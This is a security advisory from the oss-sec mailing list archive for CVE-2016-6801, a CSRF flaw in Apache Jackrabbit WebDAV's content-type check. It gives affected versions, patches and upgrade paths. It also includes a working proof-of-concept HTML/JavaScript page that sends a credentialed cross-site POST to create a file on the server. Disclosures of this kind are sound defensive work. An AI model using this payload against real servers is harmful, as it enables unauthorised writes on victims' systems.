oss-sec mailing list archives
CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type
From: Julian Reschke <reschke () apache org>
Date: Wed, 14 Sep 2016 14:34:22 +0200
CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type Severity: Important Vendor: The Apache Software Foundation Versions Affected: Apache Jackrabbit 2.4.5 Apache Jackrabbit 2.6.5 Apache Jackrabbit 2.8.2 Apache Jackrabbit 2.10.3 Apache Jackrabbit 2.12.3 Apache Jackrabbit 2.13.2 Description:The CSRF content-type check for POST requests does not handle missing Content-Type header fields, nor variations in field values with respect to upper/lower case or optional parameters. This can be exploited to create a resource via CSRF.
Mitigation:2.4.x users upgrade to 2.4.5 and apply the patch in http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released 2.6.x users upgrade to 2.6.5 and apply the patch in http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released 2.8.x users upgrade to 2.8.2 and apply the patch in http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released
2.10.x users should upgrade to 2.10.4 2.12.x users should upgrade to 2.12.4 2.13.x users should upgrade to 2.13.3 Example: A resource can be created like so: <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost:42427/test/csrf.txt", true); xhr.withCredentials = true; var body = "This file has been uploaded via CSRF.=\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"><input type="button" value="Submit request" onclick="submitRequest();" />
</form> </body> </html> Credit: This issue was discovered by Lukas Reschke.
Current thread:
- CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type Julian Reschke (Sep 14)